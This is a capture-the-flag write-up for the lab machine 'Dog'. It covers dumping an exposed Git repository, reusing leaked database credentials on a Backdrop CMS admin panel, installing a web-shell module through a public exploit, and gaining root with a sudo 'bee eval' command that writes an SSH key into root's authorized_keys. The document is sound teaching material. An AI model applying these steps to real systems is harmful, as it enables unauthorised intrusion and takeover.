Skip to content

Dog

Enumeration

Nmap scan of the target:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ nmap -sV -sC -PN -oA dog_nmap -p- 10.10.11.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-23 14:18 CEST
Nmap scan report for 10.10.11.58
Host is up (0.045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Home | Dog
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The site hosted by the web server on port 80 appears to be a blog for dog owners:

alt text

There is a link to a login page in the upper right corner, but no way of registering an account:

alt text

Foothold

The Nmap scan also found a publicly accesible Git repository in the web server root directory. The entire repository can be retrieved using a tool like git-dumper:

1
2
$ pipx install git-dumper      # installing through pipx for easier virtual environment management
$ git-dumper http://dog.htb/.git/ dog_git

The repository contains the Backdrop CMS instance running on the target:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
$ ls -la dog_git
total 87
drwxrwxr-x 8 1005 autologin    13 Jun 23 15:06 .
drwxrwxr-x 3 1005 autologin     7 Jun 23 16:28 ..
drwxrwxr-x 9 1005 autologin    15 Jun 23 15:06 core
drwxrwxr-x 7 1005 autologin     9 Jun 23 15:06 files
-rwxrwxr-x 1 1005 autologin   578 Jun 23 15:06 index.php
drwxrwxr-x 2 1005 autologin     3 Jun 23 15:06 layouts
-rwxrwxr-x 1 1005 autologin 18092 Jun 23 15:06 LICENSE.txt
-rwxrwxr-x 1 1005 autologin  5285 Jun 23 15:06 README.md
-rwxrwxr-x 1 1005 autologin  1198 Jun 23 15:06 robots.txt
-rwxrwxr-x 1 1005 autologin 21732 Jun 23 15:06 settings.php
drwxrwxr-x 2 1005 autologin     4 Jun 23 15:06 sites
drwxrwxr-x 2 1005 autologin     3 Jun 23 15:06 themes

The settings.php file is particularly interesting and contains the credentials for the application database:

1
2
3
4
5
6
7
8
9
<?php
/**
 * @file
 * Main Backdrop CMS configuration file.
 */

...
$database = 'mysql://root:Back ... @127.0.0.1/backdrop';
$database_prefix = '';

Recursively grepping the repository for dog.htb turns up a potential username:

1
2
3
4
$ grep -R dog.htb dog_git
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000  commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000     commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases

Using the username tiffany@dog.htb and the password found in the settings.php, the Backdrop admin panel can be accessed:

alt text

According to the Status report page, the version of Backdrop running on the target is 1.27.1. Searching for potential vulnerabilities for this version turned up a PoC for autenticated remote code execution.

The exploit creates a fake Backdrop module with a web shell payload. Once installed on the target (FunctionalityInstall new modulesManual installation), the shell can be reached at http://dog.htb/modules/shell/shell.php:

alt text

Stood up a Netcat listener and ran a reverse shell payload in the web shell. Got a call back in the reverse shell as www-data.

Privilege Escalation (User)

There are two home directories under /home:

1
2
3
www-data@dog:/var/www/html/modules/shell$ ls /home
jobert
johncusack

The password found in the Backdrop settings file earlier is valid for authenticating as user johncusack.

Got the user flag.

Privilege Escalation (root)

User johncusack has a sudo permission on /usr/local/bin/bee:

1
2
3
4
johncusack@dog:~$ sudo -l
...
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

According to the documentation, bee is a CLI tool for managing Backdrop. Among the usual selection of management functions, it also a command for running arbitrary PHP code:

1
2
3
4
5
...
  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
...

With sudo permissions, eval runs as root and can be used to escalate privileges.

Attempted initially to execute a PHP reverse shell that would connect to a Netcat listener, but this didn't work. Opted instead for generating an SSH key pair and placing the public key in /root/.ssh/authorized_keys using the following eval command:

1
johncusack@dog:~$ sudo bee eval '$myfile = fopen("/root/.ssh/authorized_keys", "w"); $txt = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINbuEe4FxXhIRFqe3ZZKtRFLOEs/1RIKHsjH+krlBqKy"; fwrite($myfile, $txt);'

Connected to the target over SSH as root and got the root flag.